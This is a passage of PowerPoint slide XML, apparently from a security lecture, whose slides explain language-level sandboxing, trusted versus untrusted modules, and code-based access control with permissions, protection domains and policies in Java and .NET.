        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33798" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61370965-EEBB-8140-7DFD-BA331BB24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555" y="1838325"/>
              <a:ext cx="5143500" cy="1500188"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 93"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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 sz="2400" b="1"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL"/>
                <a:t>process</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="nl-NL" sz="2400"/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2400" b="1"/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2400" b="1"/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 sz="2400" b="1"/>
                <a:t>  </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33799" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF476A0-E70E-0363-F1B1-44EBBEB65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875" y="2136775"/>
              <a:ext cx="1714500" cy="1000125"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 130"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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 b="1"/>
                <a:t>trusted   module A  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL"/>
                <a:t>                  </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33800" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299901B0-12BB-8AC6-2856-6FCB068B8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7563" y="2136775"/>
              <a:ext cx="1643062" cy="1000125"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 120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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>untrusted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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>module B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33801" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DA7570-9C82-ECB5-DA4E-2C24947E9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438" y="1851025"/>
              <a:ext cx="6667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3802" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B851BA-EB4D-8D70-9CB9-F182030AA7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125" y="1851025"/>
              <a:ext cx="6604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3803" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E157984A-F700-1DAA-DC24-B44B86619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25" y="2565400"/>
              <a:ext cx="1857375" cy="46038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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3804" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880605EA-A05E-1AD1-1691-C062D68F84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438" y="2422525"/>
              <a:ext cx="522287" cy="73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3797" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662BE1A3-9B8E-5E3C-3585-CEF00443E6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0DF3B0E7-CE9D-425D-995E-980E7740CBFE}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-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DBCBF15-916F-B87D-BBFE-E56C5716B0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01625"/>
            <a:ext cx="9288463" cy="8143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nl-NL" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400" dirty="0"/>
              <a:t>Language-level sandboxing on top of OS sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35843" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93B65C2-0C85-E442-818F-EDA21986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5759450"/>
            <a:ext cx="911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5844" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99DB30B-A14D-D2F8-7F1A-44CAC3F18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22" b="40233"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3206750" y="5776913"/>
            <a:ext cx="2232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5845" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2F728D-2AE8-A777-F184-1983B4338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5759450"/>
            <a:ext cx="95726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5846" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F79DDC4-F339-4864-C6A7-0A8B820E0101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1120775" y="1200150"/>
            <a:ext cx="7399338" cy="4478338"/>
            <a:chOff x="1212250" y="1636713"/>
            <a:chExt cx="7399938" cy="4478337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35849" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E22B5DE-71C0-F34B-9BD9-C65074924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825" y="5565775"/>
              <a:ext cx="6364288" cy="549275"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 22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 sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Hardware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> (CPU, memory, I/O peripherals)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35850" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3581164A-EBFC-5AAF-621D-FB37C00AB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688" y="1636713"/>
              <a:ext cx="4357687" cy="3114675"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 74"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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/>
                <a:t>process A</a:t>
              </a:r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2400"/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2400"/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2400"/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2400"/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2400"/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2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35851" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577493E4-ABE1-4856-03FE-92DBA438A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700" y="4922838"/>
              <a:ext cx="6335713" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 273"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AEC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 sz="2400"/>
                <a:t>Operating System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35852" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D014FC82-99BA-6A6F-94CE-A9F5B96CA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563" y="4779963"/>
              <a:ext cx="214312" cy="785812"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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3" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C5BCFE-E3E6-2906-14CD-3C8C948A7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3438" y="1636713"/>
              <a:ext cx="1428750" cy="3114675"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 74"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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/>
                <a:t>process B</a:t>
              </a:r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/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/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2400"/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2400"/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2400"/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2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35854" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C36BB1-4ECC-5FDE-9B33-0F4EA9ECC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875" y="2136775"/>
              <a:ext cx="3714750" cy="1500188"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 93"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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2400" b="1"/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 sz="2400" b="1"/>
                <a:t>  </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35855" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D810BB-7097-0123-9107-658A6A1EA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1049" y="2422536"/>
              <a:ext cx="1425405" cy="1000116"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 130"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF950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 b="1"/>
                <a:t>trusted   module A  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL"/>
                <a:t>                  </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35856" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041D28EF-CA26-CDF2-2497-7A3A9662A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438" y="2422524"/>
              <a:ext cx="1384359" cy="1000116"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 120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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>untrusted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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>module B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35857" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE6182F-1A9D-20F6-47AA-8CB806466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922" y="2136775"/>
              <a:ext cx="553961" cy="71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5858" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA632E0-50D8-D85A-7FF4-728D8E3AF9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197" y="2136775"/>
              <a:ext cx="549471" cy="57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5859" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96471CC-3BEC-283C-7A42-09ABE4170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875" y="3708400"/>
              <a:ext cx="3714750" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 125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/>
                <a:t>                    Execution engine</a:t>
              </a:r>
            </a:p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 sz="1600"/>
                <a:t>                    (eg Java or . NET VM)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35860" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6918F58F-6221-7182-E07A-431348EEF5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608" y="3797215"/>
              <a:ext cx="438680" cy="65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5861" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F034832-33B6-BD0C-9927-3359D4E9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422650"/>
              <a:ext cx="2357437" cy="1285875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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2" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8D8514-6BC1-B932-80E9-99AE4AC62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75" y="3422650"/>
              <a:ext cx="857250" cy="1285875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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5863" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D40B484-27A9-C97E-EB10-785622352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250" y="4626769"/>
              <a:ext cx="827087" cy="1163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35847" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776D2568-BA87-D1CA-6241-630F00CE1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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5553075" y="5756275"/>
            <a:ext cx="13493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8" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3255BEE3-6F65-D5C7-3822-41C69AB40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25AEAAF-1A8E-4333-80F1-DC2765D3E4F0}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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BDB88DAB-F591-58B0-1499-E23C62D5D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nl-NL"/>
              <a:t>Sand-boxing with code-based access control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B10C894-BA32-7100-4586-2BB6258D1A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7950" indent="0" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
              <a:t>Use cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="107950" indent="0" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="450850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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using code from some untrusted or less trusted library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900" lvl="1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nl-NL" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t> protection from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supply chain attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900" lvl="1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altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="450850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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concentrating security-sensitive functionality is small module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900" lvl="1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smaller code base =&gt; smaller chance of bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900" lvl="1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put best programmers on this module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900" lvl="1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do more quality assurance for this module                                             (more design reviews, more testing, more code reviews, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" indent="-285750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altLang="nl-NL" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1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altLang="nl-NL" dirty="0"/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altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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6A89052-C704-B5D2-F236-992981433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D3E39A89-B538-4301-AFF0-6F2B57E95846}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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9BCC31D1-0CA8-1087-B627-F28197D3F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nl-NL"/>
              <a:t>Sand-boxing with code-based access control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3E13D46-2EFF-B6C9-4B34-164D15F607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7950" indent="0" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
              <a:t>Language platforms such as Java and .NET provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                code-based access control                                                                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" eaLnBrk="1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nl-NL" dirty="0"/>
              <a:t>this  treats different parts of a program differently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" eaLnBrk="1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nl-NL" dirty="0"/>
              <a:t>on top of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user-based access control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>of the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1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altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="107950" indent="0" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
              <a:t>Ingredients for this access control, as for any form of access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="965200" lvl="1" indent="-457200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="965200" lvl="1" indent="-457200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protection domains)                                                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1365250" lvl="2" indent="-457200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in traditional OS access control, this is the user ID  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="965200" lvl="1" indent="-457200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1365250" lvl="2" indent="-457200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nl-NL" sz="1800" dirty="0"/>
              <a:t>which gives permissions to components,                                     </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0"/>
              <a:t>who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t> is allowed to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0"/>
              <a:t>what</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1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altLang="nl-NL" dirty="0"/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altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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4E30E76-3BF1-8CA6-573F-D5FBCDC6F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7C29FECB-5E54-49AD-A24B-3F017BBDFDE0}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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0030BFF9-A24F-AD4E-9D0A-A56C14176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01625"/>
            <a:ext cx="9070975" cy="64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Modularisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;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Compartmentalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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3200" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Sandboxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="32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2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2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5" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
